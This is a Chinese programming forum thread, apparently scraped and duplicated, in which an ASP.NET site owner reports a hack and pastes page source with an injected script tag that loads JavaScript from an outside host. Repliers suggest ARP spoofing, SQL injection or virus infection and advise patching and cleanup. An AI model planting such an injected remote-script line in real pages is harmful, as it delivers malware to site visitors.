急网站又被黑了,请帮忙看看…解决思路
日期:2014-05-18 浏览次数:20400 次
急,网站又被黑了,请帮忙看看……
asp.net(2.0)c# + Sql server2000 开发的网站
近期一直被黑,也不知道是什么原因,前一段时间是被挂马,今天又被黑了。
其中有一个网页的原代码有问题:
<head>
<title>The 'src' property had a malformed URL: '~/TradePic/2008529145517.jpg"></title><script src=http://1.cool0.biz/1.js></script><!--' is not a valid virtual path..</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
请问这个是什么原因??
网址:www.honghai56.com
------解决方案--------------------
如果服务器端 aspx里面有恶意的代码,说明服务器 安全要好好检查一下了。
------解决方案--------------------
看你服务器是什么,一般是 server2003 把,然后可以用 google baidu 搜 "server 2003安全",可以找到很多的。 按找到的设置,及时打上补丁,还有 SQL的安全,其实 都可以在网上找到。按找到的资料 设置后 可以挡住 大部分的攻击,现在都是些 用工具攻击的人。
------解决方案--------------------
楼主,你那是arp欺骗
是不是源代码没那行代码,输出就有了
是http包被人过滤了
建议装个防arp欺骗软件
------解决方案--------------------
你的网站被注入,而且修改了源文件
(1) 修改程序,把漏洞不上
(2) 察看数据库安全是不是有问题
(3)系统,操作系统的安全
系统重装,杀毒,打补丁,安装数据据库,连数据库注意事项不多说了,开网
------解决方案--------------------
我以前也出现过,是机器中毒了
把机器上全部的htm,aspx,js文件全部加上了那一句,汗死
后来杀毒,清理文件,弄了好些日子
估计楼主也中毒了。
asp.net(2.0)c# + Sql server2000 开发的网站
近期一直被黑,也不知道是什么原因,前一段时间是被挂马,今天又被黑了。
其中有一个网页的原代码有问题:
<head>
<title>The 'src' property had a malformed URL: '~/TradePic/2008529145517.jpg"></title><script src=http://1.cool0.biz/1.js></script><!--' is not a valid virtual path..</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
请问这个是什么原因??
网址:www.honghai56.com
------解决方案--------------------
如果服务器端 aspx里面有恶意的代码,说明服务器 安全要好好检查一下了。
------解决方案--------------------
看你服务器是什么,一般是 server2003 把,然后可以用 google baidu 搜 "server 2003安全",可以找到很多的。 按找到的设置,及时打上补丁,还有 SQL的安全,其实 都可以在网上找到。按找到的资料 设置后 可以挡住 大部分的攻击,现在都是些 用工具攻击的人。
------解决方案--------------------
楼主,你那是arp欺骗
是不是源代码没那行代码,输出就有了
是http包被人过滤了
建议装个防arp欺骗软件
------解决方案--------------------
你的网站被注入,而且修改了源文件
(1) 修改程序,把漏洞不上
(2) 察看数据库安全是不是有问题
(3)系统,操作系统的安全
系统重装,杀毒,打补丁,安装数据据库,连数据库注意事项不多说了,开网
------解决方案--------------------
我以前也出现过,是机器中毒了
把机器上全部的htm,aspx,js文件全部加上了那一句,汗死
后来杀毒,清理文件,弄了好些日子
估计楼主也中毒了。
免责声明: 本文仅代表作者个人观点,与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
